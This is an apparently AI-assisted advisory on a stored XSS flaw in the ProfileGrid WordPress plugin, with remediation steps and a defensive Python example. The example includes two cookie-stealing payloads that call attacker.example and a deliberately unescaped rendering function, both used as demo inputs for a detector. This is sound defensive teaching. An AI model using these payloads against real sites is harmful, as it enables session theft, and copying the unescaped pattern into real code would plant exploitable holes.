PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-4610 metagauss CVE debrief

The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pm_author_message' parameter in the pm_send_message_to_author function in all versions up to, and including, 5.9.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 5.9.8.5. The CVE was published on June 23, 2026, at 13:16:41 UTC and last modified on June 23, 2026, at 14:32:14 UTC. The CVSS score is 6.4, and the severity is MEDIUM.

Vendor
metagauss
Product
ProfileGrid – User Profiles, Groups and Communities
CVSS
MEDIUM 6.4
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-23
Original CVE updated
2026-06-23
Advisory published
2026-06-23
Advisory updated
2026-06-23

Who should care

Site owners and administrators running the ProfileGrid – User Profiles, Groups and Communities plugin on WordPress should care. The attacker needs nothing more than a Subscriber-level account, which is the role WordPress assigns to self-registered users by default, so sites with open registration are the most exposed. The injected script runs in the browser of whoever loads the page that renders the stored message, which can include higher-privileged users. Check the installed plugin version against the affected range (every release up to and including 5.9.9.2) and update to a later release.

Technical summary

The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'pm_author_message' parameter handled by the pm_send_message_to_author function. All versions up to and including 5.9.9.2 are affected; version 5.9.8.5 only partially addressed the issue. The root cause is the classic stored-XSS pattern: the submitted message is stored without sufficient input sanitization and later output without escaping, so any markup the sender includes is rendered as HTML rather than text. Any authenticated account at Subscriber level or above can therefore plant a payload that executes whenever a user views the injected page. The CVSS 3.1 vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N (base score 6.4): network-reachable, low complexity, low privileges required, no victim interaction beyond loading the page, and a scope change because the script runs in other users' browser sessions rather than only in the attacker's.

Defensive priority

Medium priority. The CVSS 3.1 base score is 6.4 (MEDIUM), but two parts of the vector matter for scheduling: PR:L means any self-registered account can plant the payload, and S:C with UI:N means the payload runs in the session of any other user who simply views the injected page, where it can act with that user's privileges. Patch in the next maintenance window, and sooner on sites that allow open registration.

Recommended defensive actions

  • Check the installed version of the ProfileGrid – User Profiles, Groups and Communities plugin. Every release up to and including 5.9.9.2 is affected, including 5.9.8.5, which only partially addressed the issue; update to a release later than 5.9.9.2.
  • Updating does not remove payloads that are already stored. Review messages and other content submitted through the plugin by low-privileged accounts for script tags, on* event-handler attributes and javascript: URLs, and remove anything found.
  • While the update is pending, a Content Security Policy that disallows inline script limits what an injected payload can do; if you maintain custom templates on top of the plugin, escape every user-supplied value on output.
  • The attacker needs an account. Where the site does not need open registration, disable it, and review existing Subscriber-level accounts for ones you do not recognise.
  • Keep plugins on a regular update cadence so that fixes of this kind are applied shortly after release.
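The flow described in the technical summary and the first two recommended actions, worked through in Python as an added example. This is not ProfileGrid's code and not an exploit against it: store_vulnerable and render_vulnerable model the store-raw, echo-raw pattern the advisory attributes to pm_send_message_to_author; store_hardened and render_hardened show the sanitize-on-input plus escape-on-output fix in plain Python, with html.escape standing in for WordPress's esc_html; the blocklist variant is illustrative only and is not a description of what the 5.9.8.5 partial patch changed; the payloads and the SAMPLE_ROWS table are constructed; and the version check encodes only the boundary the advisory states (everything up to and including 5.9.9.2). Where ProfileGrid actually persists messages is not described by the advisory, so hunt_stored_messages takes rows you would extract yourself.

```python
"""Added example for CVE-2026-4610: affected-version check, the stored-XSS
pattern next to its hardened form, and a hunt over stored messages for
active content. Standard library only; all inputs are constructed."""

import html
import re
from html.parser import HTMLParser

# Boundary stated by the advisory: every version <= 5.9.9.2 is affected.
LAST_AFFECTED = "5.9.9.2"

# Constructed attacker inputs. The second carries no <script> tag at all.
PAYLOAD_SCRIPT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
PAYLOAD_ONERROR = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'
BENIGN = "Hi, is the plugin compatible with WP 6.x? Thanks & regards, <3"


def parse_version(text):
    """'5.9.9.2' -> (5, 9, 9, 2), so that 5.9.10 sorts after 5.9.9.2."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def is_affected(installed, last_affected=LAST_AFFECTED):
    """True when installed <= last_affected; short tuples pad with zeros."""
    a, b = parse_version(installed), parse_version(last_affected)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) <= b + (0,) * (width - len(b))


class ActiveContentFinder(HTMLParser):
    """Records markup that makes a browser run script: <script> elements,
    on* event-handler attributes and javascript: URLs. Escaped text such as
    '&lt;img ...&gt;' is character data, never a tag, so it is not reported."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}[{name}] event handler")
            elif name in ("href", "src", "action") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}[{name}] javascript: URL")


def active_content(fragment):
    """Return the script-capable constructs a browser would see in fragment."""
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


# The pattern the advisory describes: stored as received, echoed as stored.
def store_vulnerable(message):
    return message


def render_vulnerable(stored):
    return f'<div class="pm-message">{stored}</div>'


# A blocklist "fix" that only strips <script> tags. Illustrates why tag
# blocklists are insufficient; NOT a description of the 5.9.8.5 partial patch.
def store_blocklist(message):
    return re.sub(r"</?\s*script\b[^>]*>", "", message, flags=re.IGNORECASE)


# Hardened: allowlist on input (plain text, no tags) AND escape on output.
def store_hardened(message):
    return re.sub(r"<[^>]*>", "", message).strip()


def render_hardened(stored):
    return f'<div class="pm-message">{html.escape(stored, quote=True)}</div>'


def hunt_stored_messages(rows):
    """Report (id, role, findings) for stored rows that would execute script
    when echoed unescaped, i.e. payloads a site on an affected version may
    already have persisted. Rows are (id, sender_role, message) tuples."""
    hits = []
    for row_id, role, message in rows:
        findings = active_content(render_vulnerable(message))
        if findings:
            hits.append((row_id, role, findings))
    return hits


SAMPLE_ROWS = [  # constructed for the demo
    (101, "subscriber", BENIGN),
    (102, "subscriber", PAYLOAD_ONERROR),
    (103, "author", "Sure, see <b>docs</b> for details."),
    (104, "subscriber", PAYLOAD_SCRIPT),
]

if __name__ == "__main__":
    for v in ("5.9.8.5", "5.9.9.2", "5.9.10"):
        print(f"{v}: {'AFFECTED' if is_affected(v) else 'outside affected range'}")
    print("vulnerable:", active_content(render_vulnerable(store_vulnerable(PAYLOAD_ONERROR))))
    print("blocklist :", active_content(render_vulnerable(store_blocklist(PAYLOAD_ONERROR))))
    print("hardened  :", active_content(render_hardened(store_hardened(PAYLOAD_ONERROR))))
    for hit in hunt_stored_messages(SAMPLE_ROWS):
        print("stored payload:", hit)
```

Two things the run makes visible that the summary only states: the blocklist variant stops the script-tag payload but leaves the onerror payload live, which is the general weakness of tag blocklists, and output escaping on its own already neutralises both payloads, because escaped text is character data to the browser. Input sanitization is kept as defence in depth, not as the sole control. Row 103 in the hunt shows that benign inline markup is not flagged; only script elements, event handlers and javascript: URLs are.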

Evidence notes

The CVE-2026-4610 record was reported by [email protected] and covers the ProfileGrid – User Profiles, Groups and Communities plugin for WordPress. The stored evidence carries a CVSS 3.1 base score of 6.4 (MEDIUM), a publication time of June 23, 2026 at 13:16:41 UTC and a last-modified time of 14:32:14 UTC the same day, and no CISA KEV listing.

Official resources

This article is AI-assisted and based on the supplied source corpus.